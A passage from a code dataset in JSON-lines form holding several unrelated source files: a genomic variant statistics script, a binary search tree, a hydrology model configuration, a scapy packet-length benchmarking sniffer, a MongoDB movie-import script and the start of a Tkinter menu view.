\".snpEff_Stat.txt\"\r\n\t\tif ( os.path.exists(out_SNV_F)):\r\n\t\t\tos.remove(out_SNV_F)\r\n\t\tout_SNP_F_O=open(out_SNV_F,'a')\r\n\t\tout_SNP_F_O.write(Header + \"\\n\")\r\n\t\tout_SNP_F_O.write(lines + \"\\n\")\r\n\t\tout_SNP_F_O.close()\t\r\n\r\n##-----------\r\n\t\t##person SNV syn Stat\r\n\t\tEff_PersonSNV_geneLst = []\r\n\t\tfor sample in cladeSamps:\r\n\t\t\tfor Gene in allEff_Stat_Dic[sample]:\r\n\t\t\t\t#if allEff_Stat_Dic[sample][Gene] > 1 and Gene not in PersonSNV_geneLst:\r\n\t\t\t\tif Gene not in Eff_PersonSNV_geneLst:\r\n\t\t\t\t\tEff_PersonSNV_geneLst.append(Gene)\r\n\r\n\r\n\t\tlinesLst = []\r\n\t\tfor Gene in Eff_PersonSNV_geneLst:\r\n\t\t\tlineLst = [Gene]\r\n\t\t\tallNum = 0\r\n\t\t\tfor sample in cladeSamps:\r\n\t\t\t\tif Gene in allEff_Stat_Dic[sample] and \"SNV_syn\" in allEff_Stat_Dic[sample][Gene]:\r\n\t\t\t\t\tNum = allEff_Stat_Dic[sample][Gene][\"SNV_syn\"]\r\n\t\t\t\telse:\r\n\t\t\t\t\tNum = 0\r\n\t\t\t\tallNum += Num\r\n\r\n\t\t\t\tlineLst.append(str(Num))\r\n\t\t\tlineLst.append(str(allNum))\r\n\t\t\tline = \"\\t\".join(lineLst)\r\n\t\t\tif allNum >= 3 * len(cladeSamps):\r\n\t\t\t\tlinesLst.append(line)\r\n\r\n\r\n\t\tlines = \"\\n\".join(linesLst)\r\n\r\n\r\n\r\n\t\toutHeader = [\"gene\"]\r\n\t\tfor sample in cladeSamps:\r\n\t\t\toutHeader.append(sample)\r\n\t\toutHeader.append(\"SumNum\")\r\n\t\tHeader = \"\\t\".join(outHeader)\r\n\r\n\r\n\t\tout_SNV_F = out_P + \"/\" + clade + \".snv_\" + str(snv_MinFreq) + \"-\" + str(snv_MaxFreq) + \".snpEff_Stat.Syn.txt\"\r\n\t\tif ( os.path.exists(out_SNV_F)):\r\n\t\t\tos.remove(out_SNV_F)\r\n\t\tout_SNP_F_O=open(out_SNV_F,'a')\r\n\t\tout_SNP_F_O.write(Header + \"\\n\")\r\n\t\tout_SNP_F_O.write(lines + \"\\n\")\r\n\t\tout_SNP_F_O.close()\t\r\n\r\n\r\n\r\n\r\n######\r\n\t\t##person SNV Nonsyn Stat\r\n\r\n\t\tEff_PersonSNV_geneLst = []\r\n\t\tfor sample in cladeSamps:\r\n\t\t\tfor Gene in allEff_Stat_Dic[sample]:\r\n\t\t\t\t#if allEff_Stat_Dic[sample][Gene] > 1 and Gene not in PersonSNV_geneLst:\r\n\t\t\t\tif Gene not in Eff_PersonSNV_geneLst:\r\n\t\t\t\t\tEff_PersonSNV_geneLst.append(Gene)\r\n\r\n\r\n\t\tlinesLst = []\r\n\t\tfor Gene in Eff_PersonSNV_geneLst:\r\n\t\t\tlineLst = [Gene]\r\n\t\t\tallNum = 0\r\n\t\t\tfor sample in cladeSamps:\r\n\t\t\t\tif Gene in allEff_Stat_Dic[sample] and \"SNV_nonsyn\" in allEff_Stat_Dic[sample][Gene]:\r\n\t\t\t\t\tNum = allEff_Stat_Dic[sample][Gene][\"SNV_nonsyn\"]\r\n\t\t\t\telse:\r\n\t\t\t\t\tNum = 0\r\n\t\t\t\tallNum += Num\r\n\r\n\t\t\t\tlineLst.append(str(Num))\r\n\t\t\tlineLst.append(str(allNum))\r\n\t\t\tline = \"\\t\".join(lineLst)\r\n\t\t\tif allNum >= 3 * len(cladeSamps):\r\n\t\t\t\t\r\n\t\t\t\tlinesLst.append(line)\r\n\r\n\r\n\t\tlines = \"\\n\".join(linesLst)\r\n\r\n\r\n\r\n\t\toutHeader = [\"gene\"]\r\n\t\tfor sample in cladeSamps:\r\n\t\t\toutHeader.append(sample)\r\n\t\toutHeader.append(\"SumNum\")\r\n\t\tHeader = \"\\t\".join(outHeader)\r\n\r\n\r\n\t\tout_SNV_F = out_P + \"/\" + clade + \".snv_\" + str(snv_MinFreq) + \"-\" + str(snv_MaxFreq) + \".snpEff_Stat.NonSyn.txt\"\r\n\t\tif ( os.path.exists(out_SNV_F)):\r\n\t\t\tos.remove(out_SNV_F)\r\n\t\tout_SNP_F_O=open(out_SNV_F,'a')\r\n\t\tout_SNP_F_O.write(Header + \"\\n\")\r\n\t\tout_SNP_F_O.write(lines + \"\\n\")\r\n\t\tout_SNP_F_O.close()\t\r\n\r\n\t\tprint()\r\n\t\tprint()\r\n\r\n\r\n\r\n\r\n\r\n\r\n'''\r\n## snv Eff of each sample \r\n\t\tHeader = \"\\t\".join([\"Sample\",\"posi\",\"Flag\",\"Freq\"])\t\r\n\t\tfor sample in cladeSamps:\r\n\t\t\toutlines = []\r\n\t\t\t#print(sample)\r\n\t\t\tfor Posi in allFreqDic[sample]:\r\n\t\t\t \tfor Eff_Flag in allFreqDic[sample][Posi]:\r\n\t\t\t \t#for Eff_Flag in [\"iSNV_Miss\",\"iSNV_Syn\"]:\r\n\t\t\t \t\tif Eff_Flag != \"iSNV_nonCoding\":\r\n\t\t\t \t \t\tline = \"\\t\".join([sample,Posi,Eff_Flag,str(allFreqDic[sample][Posi][Eff_Flag])])\r\n\t\t\t \t \t\toutlines.append(line)\r\n\t\t\tout = \"\\n\".join(outlines)\r\n\r\n\t\t\t#print(sample.split(\"_BDM\")[0].split(\"BJ13-\")[1]+ \"hh\") \r\n\r\n\t\t\tout_SNVFreq_F = out_P + \"/\" + sample + \".snv_\" + str(snv_MinFreq) + \"-\" + str(snv_MaxFreq) + \".Eff_Freq.txt\"\r\n\t\t\tif ( os.path.exists(out_SNVFreq_F)):\r\n\t\t\t\tos.remove(out_SNVFreq_F)\r\n\t\t\tout_SNP_F_O=open(out_SNVFreq_F,'a')\r\n\t\t\tout_SNP_F_O.write(Header + \"\\n\")\r\n\t\t\tout_SNP_F_O.write(out + \"\\n\")\r\n\t\t\tout_SNP_F_O.close()\t\r\n'''\r\n\r\n\r\n\r\n'''\r\n##person SNP snpeff Stat of SNP\r\n\t\tPersonSNP_geneLst = []\r\n\t\tfor sample in cladeSamps:\r\n\t\t\tfor Gene in CladeSNP_snpeffGeneDic[sample]:\r\n\t\t\t\t#if CladeSNP_snpeffGeneDic[sample][Gene] > 1 and Gene not in PersonSNP_geneLst:\r\n\t\t\t\tif Gene not in PersonSNP_geneLst:\r\n\t\t\t\t\tPersonSNP_geneLst.append(Gene)\r\n\r\n\t\tlinesLst = []\r\n\t\tfor Gene in PersonSNP_geneLst:\r\n\t\t\tlineLst = [Gene]\r\n\t\t\tallNum = 0\r\n\t\t\tfor sample in cladeSamps:\r\n\t\t\t\tif Gene in CladeSNP_snpeffGeneDic[sample]:\r\n\t\t\t\t\tNum = CladeSNP_snpeffGeneDic[sample][Gene]\r\n\t\t\t\telse:\r\n\t\t\t\t\tNum = 0\r\n\t\t\t\tallNum += Num\r\n\t\t\t\tlineLst.append(str(Num))\r\n\t\t\tlineLst.append(str(allNum))\r\n\t\t\tline = \"\\t\".join(lineLst)\r\n\t\t\t\r\n\t\t\tlinesLst.append(line)\r\n\r\n\t\tlines = \"\\n\".join(linesLst)\r\n\r\n\t\tout_SNP_F = out_P + \"/\" + clade + \".SNP_Over-\" + str(snv_MaxFreq) + \".snpEff_Stat.txt\"\r\n\t\tif ( os.path.exists(out_SNP_F)):\r\n\t\t\tos.remove(out_SNP_F)\r\n\t\tout_SNP_F_O=open(out_SNP_F,'a')\r\n\t\tout_SNP_F_O.write(Header + \"\\n\")\r\n\t\tout_SNP_F_O.write(lines + \"\\n\")\r\n\t\tout_SNP_F_O.close()\t\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n###---------------intra and inter gene\r\n\t\t#print(snv_interNumDic)\r\n\r\n\t\tPersonSNV_geneLst = []\r\n\t\tHeader = \"\\t\".join([\"sample\",\"SNV_intraGeneNum\",\"SNV_interGeneNum\",\"SNP_intraGeneNum\",\"SNP_interGeneNum\",\"SNV_syn_Num\",\"SNV_Nonsyn_Num\",\"SNP_syn_Num\",\"SNP_Nonsyn_Num\"])\r\n\t\t\r\n\t\t#SNV_intraNumLst = []\r\n\t\t#SNV_interNumLst = []\r\n\t\toutlines = []\r\n\t\tfor sample in cladeSamps:\r\n\t\t\t#SNV_intraNumLst.append(snv_interNumDic[sample][0])\r\n\t\t\t#SNV_interNumLst.append(snv_interNumDic[sample][1])\r\n\r\n\t\t\tintra_inter_Line = [sample]\r\n\t\t\tfor NUM in snv_interNumDic[sample]:\r\n\t\t\t\tintra_inter_Line.append(str(NUM))\r\n\r\n\t\t\toutlines.append(\"\\t\".join(intra_inter_Line))\r\n\t\tout = \"\\n\".join(outlines)\r\n\r\n\r\n\t\tout_intra_inter_Gene_snvSNPStat_F = out_P + \"/\" + clade + \".snvSNP_\" + str(snv_MinFreq) + \".\" + str(snv_MaxFreq) + \".intra-inter.Gene.Stat.txt\"\r\n\t\tif ( os.path.exists(out_intra_inter_Gene_snvSNPStat_F)):\r\n\t\t\tos.remove(out_intra_inter_Gene_snvSNPStat_F)\r\n\t\tout_SNP_F_O=open(out_intra_inter_Gene_snvSNPStat_F,'a')\r\n\t\tout_SNP_F_O.write(Header + \"\\n\")\r\n\t\tout_SNP_F_O.write(out + \"\\n\")\r\n\t\tout_SNP_F_O.close()\t\r\n\r\n'''\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\tusage = \"usage:python %prog [option]\"\r\n\tparser = OptionParser(usage=usage)\r\n\r\n\tparser.add_option(\"-i\",\"--iSNV_SNP_table\",\r\n\t\t\t\t\t dest = \"iSNV_SNP_table\",\r\n\t\t\t\t\t default = \"\",\r\n\t\t\t\t\t metavar = \"file\",\r\n\t\t\t\t\t help = \"iSNV table. [required]\")\r\n\tparser.add_option(\"-o\",\"--out_P\",\r\n\t\t\t\t\t dest = \"out_P\",\r\n\t\t\t\t\t default = \"\",\r\n\t\t\t\t\t metavar = \"path\",\r\n\t\t\t\t\t help = \"output stat file Path of snv Freq distribution. [required]\")\r\n\r\n\tparser.add_option(\"-f\",\"--InfoF\",\r\n\t\t\t\t\t dest = \"InfoF\",\r\n\t\t\t\t\t default = \"\",\r\n\t\t\t\t\t metavar = \"file\",\r\n\t\t\t\t\t help = \"Info File. [required]\")\r\n\r\n\tparser.add_option(\"-E\",\"--FiltEcoliPosiF\",\r\n\t\t\t\t\t dest = \"FiltEcoliPosiF\",\r\n\t\t\t\t\t default = \"\",\r\n\t\t\t\t\t metavar = \"file\",\r\n\t\t\t\t\t help = \"Filt Ecoli homo Posi file. [required]\")\r\n\tparser.add_option(\"-R\",\"--RepeatMaskedGnm\",\r\n\t\t\t\t\t dest = \"RepeatMaskedGnm\",\r\n\t\t\t\t\t default = \"\",\r\n\t\t\t\t\t metavar = \"file\",\r\n\t\t\t\t\t help = \"RepeatMasker marked Gnm. [required]\")\r\n\tparser.add_option(\"-e\",\"--snpEffPath\",\r\n\t\t\t\t\t dest = \"snpEffPath\",\r\n\t\t\t\t\t default = \"\",\r\n\t\t\t\t\t metavar = \"path\",\r\n\t\t\t\t\t help = \"snpEff file Path. [required]\")\r\n\r\n\tparser.add_option(\"-m\",\"--snv_MinFreq\",\r\n\t\t\t\t\t dest = \"snv_MinFreq\",\r\n\t\t\t\t\t default = \"0.1\",\r\n\t\t\t\t\t metavar = \"float\",\r\n\t\t\t\t\t help = \"min Freq of snv to calculate (0-100%). [required]\")\r\n\tparser.add_option(\"-M\",\"--snv_MaxFreq\",\r\n\t\t\t\t\t dest = \"snv_MaxFreq\",\r\n\t\t\t\t\t default = \"0.9\",\r\n\t\t\t\t\t metavar = \"float\",\r\n\t\t\t\t\t help = \"max Freq of snv to calculate (0-100%). [required]\")\r\n\r\n\t\r\n\t(options,args) = parser.parse_args()\r\n\tiSNV_SNP_table = os.path.abspath(options.iSNV_SNP_table)\r\n\tout_P\t\t = os.path.abspath(options.out_P)\r\n\tInfoF = os.path.abspath(options.InfoF)\r\n\tFiltEcoliPosiF = os.path.abspath(options.FiltEcoliPosiF)\r\n\tRepeatMaskedGnm = os.path.abspath(options.RepeatMaskedGnm)\r\n\tsnpEffPath = os.path.abspath(options.snpEffPath)\r\n\t\r\n\tsnv_MinFreq\t\t= float(options.snv_MinFreq)\r\n\tsnv_MaxFreq\t\t= float(options.snv_MaxFreq)\r\n\r\n\tif ( not os.path.exists(out_P)):\r\n\t\tos.mkdir(out_P)\r\n\r\n\r\n\tmain()\r\n\r\n\r\n\r\n\r\n","repo_name":"lhj920321/HP-microevolution","sub_path":"scripts/iSNV_calling/iSNVpy_iSNV_snpeff_clade.py","file_name":"iSNVpy_iSNV_snpeff_clade.py","file_ext":"py","file_size_in_byte":19912,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"72082406985","text":"from collections import deque\n\n\nclass Node:\n def __init__(self, data=None):\n self.data = data\n self.right_child = None\n self.left_child = None\n\n\nclass Tree:\n def __init__(self):\n self.root_node = None\n\n def find_min(self):\n current = self.root_node\n while current.left_child:\n data = current.data\n current = current.left_child\n return data\n\n def find_max(self):\n current = self.root_node\n while current.right_child:\n data = current.data\n current = current.right_child\n return data\n\n def insert(self, data):\n node = Node(data)\n if self.root_node is None:\n self.root_node = node\n else:\n current = self.root_node\n parent = None\n while True:\n parent = current\n if node.data < current.data:\n current = current.left_child\n if current is None:\n parent.left_child = node\n return\n else:\n current = current.right_child\n if current is None:\n parent.right_child = node\n return\n\n def get_node_with_parent(self, data):\n current = self.root_node\n parent = None\n if current is None:\n return (parent, current)\n\n while True:\n if current.data == data:\n return (parent, current)\n elif data < current.data:\n parent = current\n current = current.left_child\n else:\n parent = current\n current = current.right_child\n return (parent, current)\n\n def remove(self, data):\n parent, node = self.get_node_with_parent(data)\n\n if parent is None and node is None:\n return False\n\n children_count = 0\n if node.right_child and node.left_child:\n children_count = 2\n elif (node.left_child is None) and node.right_child is None:\n children_count = 0\n else:\n children_count = 1\n\n if children_count == 0:\n if parent:\n if parent.right_child is node:\n parent.right_child = None\n else:\n parent.left_child = None\n\n else:\n self.root_node = None\n elif children_count == 1:\n next_node = None\n if node.left_child:\n next_node = node.left_child\n else:\n next_node = node.right_child\n\n if parent:\n if parent.right_child is node:\n parent.right_child = next_node\n else:\n parent.left_child = next_node\n else:\n self.root_node = next_node\n else:\n parent_of_leftmost_node = node\n leftmost_node = node.right_child\n while leftmost_node.left_child:\n parent_of_leftmost_node = leftmost_node\n leftmost_node = leftmost_node.left_child\n node.data = leftmost_node.data\n if parent_of_leftmost_node.left_child == leftmost_node:\n parent_of_leftmost_node.left_child = leftmost_node.right_child\n else:\n parent_of_leftmost_node.right_child = leftmost_node.right_child\n\n def search(self, data):\n current = self.root_node\n while True:\n if current is None:\n return None\n if current.data == data:\n return data\n elif current.data > data:\n current = current.left_child\n else:\n current = current.right_child\n\n def breadth_first_traversal(self):\n list_of_nodes = []\n traversal_queue = deque([self.root_node])\n\n while len(traversal_queue) > 0:\n node = traversal_queue.popleft()\n list_of_nodes.append(node.data)\n if node.left_child:\n traversal_queue.append(node.left_child)\n if node.right_child:\n traversal_queue.append(node.right_child)\n return list_of_nodes\n\n\nt1 = Tree()\nt1.insert(50)\nt1.insert(60)\nt1.insert(80)\nt1.insert(30)\nt1.insert(20)\nprint(t1.breadth_first_traversal())\n","repo_name":"jatin14mehta/projects","sub_path":"tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":4392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"8753821785","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Mar 7 15:33:38 2022\r\n\r\n@author: TEJan\r\n\"\"\"\r\n\r\n\r\nimport pathlib\r\n\r\n## Time steps for hourly/weekly model runs\r\n# - TODO replace numberOfTimeSteps for number_of_timesteps_hourly\r\n# Define number of hourlyy time steps to run\r\nnumber_of_timesteps_hourly = 3000 # in hours AFRONDEN OP 100 TAL, ZODAT HET DEELBAAR IS DOOR WINDOWSIZE IN STATEVARIABLES \r\n# number_of_timesteps_hourly = 8760 # ~1y in hours\r\n\r\n#Step size between h-model runs\r\n#stepsizeSnapshots = 5200 mag er later uit\r\n\r\ncutoff = False\r\n\r\n#Loop over snapshots\r\nstepsInShift = 100\r\nstepsTotal = 100\r\n# For 1 h-model run as test, use number_of_timesteps_weekly \r\n\r\n\r\n# Define number of weekly time steps to run\r\nnumber_of_timesteps_weekly = 104000\r\n#number_of_timesteps_weekly = 5200 # in weeks\r\n# number_of_timesteps_weekly = 104000 # ~2000y in weeks\r\n\r\n## Rate of forcing (grazing)\r\n# Define the fraction of total time at which no grazing occurs at the beginning (baseline for initial state)\r\nrel_start_grazing = 1/16\r\n# rel_start_grazing = 0\r\n# Define the total increase in grazing rate\r\ntot_increase_grazing = 0.0003\r\n# Select whether grazing rate returns to the initial value after the halfway point\r\n# - note that this halfway point occurs on (1 - rel_start) * total time / 2\r\nreturn_ini_grazing = True\r\n\r\n## Number of Monte Carlo (MC) runs\r\n# Define the number of MC samples or particles, results of realizations are written to the folder(s) 1, 2, ...\r\nnrOfSamples = 1\r\n\r\n## Particle filtering\r\n# When True, a particle filtering run is done, usually False for first time users\r\nfiltering = False\r\n\r\n## Create realizations\r\n# Selects whether a single, given value is used for a number of parameters or whether a realization for that parameter\r\n# is drawn randomly. Usually False for first time users.\r\ncreateRealizations = False\r\n\r\n## Calculate upstream totals\r\n# Selects whether upstream totals are calculated (accuflux) in the subsurfacewateronelayer and interceptionuptomaxstore\r\n# modules. May be needed for some reports and possibly budget checks (if one needs these). For normal use, this is set\r\n# to False.\r\ncalculateUpstreamTotals = False\r\n\r\n\r\n\r\n\r\n\r\n##############\r\n\r\n# Parameters \r\n\r\n##############\r\n\r\n## Reporting of variables\r\n# Selects which set of variables are reported, either 'full' or 'filtering'. These are passed to the class of a\r\n# component where the variables that can be reported can be defined.\r\n# setOfVariablesToReport = 'full'\r\n# setOfVariablesToReport = 'filtering'\r\nsetOfVariablesToReport = 'None'\r\n\r\n# Option to call the methods that change the geomorphology in the weekly model, typically True\r\nchangeGeomorphology = True\r\n\r\n# Option to fix both the regolith and the vegetation in the weekly model, typically False\r\nfixedStates = False\r\n\r\n## Timesteps to report variables for both hourly and weekly\r\n\r\n# Saving map files which can be used for spatial EWS or hourly model\r\n\"Weekly only\" # TODO - Might be worthwhile to implement this into the hourly model\r\nmap_data = True\r\nmean_timeseries_data = True\r\ninterval_map_snapshots = 100\r\n\r\n# definition for components were all timesteps should be reported\r\ntimesteps_to_report_all_hourly = list(range(1, number_of_timesteps_hourly + 1, 1))\r\ntimesteps_to_report_all_weekly = list(range(interval_map_snapshots, number_of_timesteps_weekly + 1,\r\n interval_map_snapshots))\r\n# timeStepsToReportAll = list(range(1, number_of_timesteps_hourly + 1, 1))\r\n\r\n# Used for discharge (hourly model only)\r\ntimeStepsToReportRqs = list(range(20, number_of_timesteps_hourly + 1, 20))\r\n\r\n# definition for components were a subset of timesteps should be reported\r\ntimesteps_to_report_some_hourly = list(range(100, number_of_timesteps_hourly + 1, 100))\r\ntimesteps_to_report_some_weekly = list(range(100, number_of_timesteps_weekly + 1, interval_map_snapshots))\r\n# timeStepsToReportSome = list(range(100, number_of_timesteps_hourly + 1, 100))\r\n\r\n\r\n## State variables for which to calculate Early Warning Signals (both hourly & weekly)\r\n# - TODO change state_variables_for_ews to state_variables_for_ews_hourly\r\n# - TODO check the 'full' list in EWS_StateVariables.py\r\n#state_variables_for_ews_hourly = ['Gs']\r\nstate_variables_for_ews_hourly = 'full'\r\nstate_variables_for_ews_weekly = ['bioM', 'bioA', 'moiM', 'moiA', \"regA\"]\r\n# state_variables_for_ews_weekly = 'full'\r\n\r\n## Reporting for the model components (both hourly and weekly)\r\nif setOfVariablesToReport == 'full':\r\n interception_report_rasters = [\"Vo\", \"Vi\", \"Vgf\", \"Vms\", \"Vs\"]\r\n # reports of totals (Vot) only make sense if calculateUpstreamTotals is True\r\n infiltration_report_rasters_weekly = [\"Ii\", \"Is\", \"Iks\"]\r\n infiltration_report_rasters = [\"Ii\", \"Ij\", \"Is\", \"Iks\"] # TODO - might want to rename this to \"\"_hourly, as above\r\n runoff_report_rasters = [\"Rq\", \"Rqs\"]\r\n subsurface_report_rasters = [\"Gs\", \"Go\"] \r\n # reports of totals (Gxt, Got) only make sense if calculateUpstreamTotals is True\r\n shading_report_rasters = [\"Mfs\", \"Msc\", \"Msh\"]\r\n surfacestore_report_rasters = [\"Ss\", \"Sc\"]\r\n rainfalleventsfromgammadistribution_report_rasters = [\"Pf\"]\r\n exchange_report_rasters = [\"Xrc\"]\r\n soilwashMMF_report_rasters = [\"Wde\", \"Wdm\", \"Wfl\"]\r\n regolith_report_rasters = [\"Ast\"]\r\n bedrockweathering_report_rasters = [\"Cwe\"]\r\n evapotrans_report_rasters = [\"Ep\", \"Epc\"]\r\n evapotranspirationsimple_report_rasters = [\"Ep\", \"Ea\"]\r\n biomassmodifiedmay_report_rasters = [\"Xs\"]\r\n baselevel_report_rasters = [\"Ll\"]\r\n creep_report_rasters = [\"Ds\"]\r\n randomparameters_report_rasters = [\"RPic\", \"RPks\", \"RPrt\", \"RPsc\", \"RPmm\"]\r\nelif setOfVariablesToReport == 'filtering':\r\n interception_report_rasters = [\"Vs\", \"Vgf\"]\r\n # reports of totals (Vot) only make sense if calculateUpstreamTotals is True\r\n infiltration_report_rasters_weekly = []\r\n infiltration_report_rasters = []\r\n runoff_report_rasters = [\"Rq\"]\r\n subsurface_report_rasters = []\r\n # reports of totals (Gxt, Got) only make sense if calculateUpstreamTotals is True\r\n shading_report_rasters = []\r\n surfacestore_report_rasters = []\r\n rainfalleventsfromgammadistribution_report_rasters = []\r\n exchange_report_rasters = []\r\n soilwashMMF_report_rasters = []\r\n regolith_report_rasters = []\r\n bedrockweathering_report_rasters = []\r\n evapotrans_report_rasters = []\r\n evapotranspirationsimple_report_rasters = []\r\n biomassmodifiedmay_report_rasters = []\r\n baselevel_report_rasters = []\r\n creep_report_rasters = []\r\n randomparameters_report_rasters = []\r\nelif setOfVariablesToReport == 'None':\r\n interception_report_rasters = []\r\n # reports of totals (Vot) only make sense if calculateUpstreamTotals is True\r\n infiltration_report_rasters_weekly = []\r\n infiltration_report_rasters = []\r\n runoff_report_rasters = []\r\n subsurface_report_rasters = []\r\n # reports of totals (Gxt, Got) only make sense if calculateUpstreamTotals is True\r\n shading_report_rasters = []\r\n surfacestore_report_rasters = []\r\n rainfalleventsfromgammadistribution_report_rasters = []\r\n exchange_report_rasters = []\r\n soilwashMMF_report_rasters = []\r\n regolith_report_rasters = []\r\n bedrockweathering_report_rasters = []\r\n evapotrans_report_rasters = []\r\n evapotranspirationsimple_report_rasters = []\r\n biomassmodifiedmay_report_rasters = []\r\n baselevel_report_rasters = []\r\n creep_report_rasters = []\r\n randomparameters_report_rasters = []\r\n\r\n# TODO - Put the parts below above the reporting for the model components in their respective place, i.e. hour/week\r\n# model parts above the EWS stuff, after removal of unnecessary statements.\r\n\r\n######################\r\n# Hourly inputs only #\r\n######################\r\n\r\n# folder with input files (maps, timeseries)\r\ninputFolder = \"inputs_from_weekly\"\r\n\r\n# switch to report for locations as small numpy files\r\n# mainly used for particle filtering\r\ndoReportComponentsDynamicAsNumpy = False\r\n\r\n# switch to swap parameter values between two catchments\r\n# first time users will need to set this to False\r\nswapCatchments = False\r\n\r\n# when True, one can read a set of parameters for all Monte Carlo realizations\r\n# from disk (e.g. representing probability distributions from a calibration)\r\n# first time users should have a False here\r\nreadDistributionOfParametersFromDisk = False\r\n\r\n\r\nwith_shading = True\r\n\r\nif with_shading is False:\r\n fractionReceivedValue = 1.0\r\n fractionReceivedFlatSurfaceValue = 1.0\r\n\r\n\r\nprobabilityOfRainstorm=0.4\r\nrainstormDuration=2\r\nexpectedRainfallIntensity=0.002\r\ngammaShapeParameter=100\r\n\r\n\r\n\r\n\r\n################\r\n# model inputs #\r\n################\r\n\r\n# general ########\r\n\r\n \r\n# set \r\ncloneString = str(pathlib.Path(inputFolder,\"clone.map\"))\r\n\r\n\r\n# report locations, i.e. outflow points, for instance, at the outlet\r\nlocations = str(pathlib.Path(inputFolder, \"clone.map\"))\r\n\r\n\r\n# meteorology #######\r\n\r\n#Deze mogen er ook uit als we evaporatie met simple doen\r\n# airTemperatureDetermString = str(pathlib.Path(inputFolder, \"airTemperatureArnaJulAugSep0506.tss\"))\r\n# relativeHumidityDetermString = str(pathlib.Path(inputFolder, \"relativeHumidityArnasJulAugSep0506.tss\"))\r\n# incomingShortwaveRadiationFlatSurfaceString = str(pathlib.Path(inputFolder, \"incomingShortwaveRadiationArnasJulAugSep0506.tss\"))\r\n# windVelocityDetermString = str(pathlib.Path(inputFolder, \"windVelocityArnasJulAugSep0506.tss\"))\r\n# elevationAboveSeaLevelOfMeteoStationValue = 900.0\r\n\r\n\r\n# interception #######\r\n# maximumInterceptionCapacityValue = mogelijk relevant voor w-model\r\n# leafAreaIndexValue = mogelijk relevant voor w-model\r\n\r\n\r\n# surface storage ######\r\nmaxSurfaceStoreValue = 0.0001 \r\n\r\n\r\n# infiltration #######\r\n\r\n\r\n# regolith geometry ########\r\n# regolithThickness = mogelijk relevant voor w-model \r\n\r\n\r\n#TIJMEN reeds verandert in w-model parameters\r\n# 'groundwater' (saturated flow) ##########\r\nsaturatedConductivityMetrePerDayValue = 12.5 \r\nlimitingPointFractionValue = 0.05\r\nmergeWiltingPointFractionFSValue = 0.019\r\nfieldCapacityFractionValue = 0.22\r\n\r\n# green and ampt\r\n# ksatValue = mogelijk relevant voor w-model\r\ninitialSoilMoistureFractionCFG = 0.22 # (= fieldCapacityFractionValue)\r\nsoilPorosityFractionValue = 0.43\r\n\r\n# evapotranspiration ###########\r\n\r\n# penman\r\n# Physiclly rrelevant, a remnant of old model structure\r\nmultiplierMaxStomatalConductanceValue = 1.0\r\n\r\n\r\n# # Irrelevant bij simple evaporation\r\n# albedoSoil = 0.3\r\n# albedoVeg = 0.2\r\n\r\n\r\n\r\n# real time of first time step, duration of time step\r\n# IMPORTANT NOTE: THIS IS NOW UTC TIME ALMOST CERTAINLY AT LEAST FOR SHADING\r\n# print(\"# IMPORTANT NOTE: THIS IS NOW UTC TIME ALMOST CERTAINLY AT LEAST FOR SHADING\")\r\nstartTimeYearValue = 2005\r\nstartTimeMonthValue = 7\r\nstartTimeDayValue = 1\r\ntimeStepDurationHoursFloatingPointValue = 1.0 # only tested for one hour!!!!\r\n\r\n\r\n# lat long for shading (solar radiation)\r\nlatitudeOfCatchment = 52.12833333\r\nlongitudeOfCatchment = 5.19861111\r\ntimeZone = \"Europe/Madrid\"","repo_name":"TijmenJanssen/Pycatch","sub_path":"hourly_configuration.py","file_name":"hourly_configuration.py","file_ext":"py","file_size_in_byte":11014,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"5059499350","text":"#!/usr/bin/env python2.7\n\nfrom scapy.all import *\nimport time\n\nFILE = \"output_lzo_smb.txt\"\n\nconf.iface6 = 'D-1'\n\ncount = 0\n\nfo = open(FILE, \"w+\")\n\ndef filter_SEG(pkt):\n if IPv6ExtHdrSegment in pkt:\n return 1\n\ndef trigger_count(pkt):\n global count\n count += len(pkt[1])\n fo.write(\"{} {}\\n\".format(pkt[1].fl, len(pkt[1])))\n\nsniff(prn=trigger_count, lfilter=filter_SEG, store=0, iface=conf.iface6)\n\nprint(count)\n","repo_name":"Tycale/SFC-SR","sub_path":"tools/compression_benchmarking/compression_get.py","file_name":"compression_get.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"43844965765","text":"\n## download link: https://raw.githubusercontent.com/prust/wikipedia-movie-data/master/movies.json\n## American Movies Scrapped from America \n\n## JSON contains: title, year, director,cast, genre, and notes\n\n##\n## We imported by importing the json module\n## Then we open the json and used a variable to hold the json contents (this variable is a list)\n## Using insert_many we inserted everything in the list into the database. \n##\n##\n\nimport pymongo, json\nwith open(\"movies.json\", \"r\") as f:\n moviesList = json.load(f)\n\nconnection = pymongo.MongoClient(\"homer.stuy.edu\")\ndb = connection.leiGkalmakovaB \ncollection = db.movies\ncollection.insert_many(moviesList) \n\n\ndef queryTitle(title):\n queryList = collection.find({\"title\": title})\n return queryList\n\ndef queryYear(year):\n queryList = collection.find({\"year\": year})\n s = \"\"\n for each in queryList:\n s = s + each[\"title\"] + \", \" + str(each[\"year\"]) + \"; \"\n return s\n\ndef queryDirector(director):\n queryList = collection.find({\"director\": director})\n return queryList\n\ndef queryGenre(genre):\n queryList = collection.find({\"genre\": genre})\n return queryList\n\n##def queryInclusiveBetweenYears(y1,y2):\n## queryList = []\n## for each in collection.find({\"$and\": [{\"year\":{\"$lte\": y2}}, {\"year\":{\"$gte\": y1}}]}):\n## #print each\n## queryList.extend(each)\n## return queryList\n\n##queryTitle(\"After Dark in Central\")\n##queryYear(1900)\n##queryDirector(\"James H. White\")\n##queryGenre(\"Short\")\n##queryInclusiveBetweenYears(1900,1902)\n","repo_name":"BermetKalmakova/06flask","sub_path":"movies.py","file_name":"movies.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18364855363","text":"from tkinter import ttk, constants\n\nfrom services.user_service import user_service\n\nclass MenuView:\n def __init__(self, root, handle_logout_view, handle_new_typing_test_view, handle_user_statistics_view):\n \n self._root = root\n 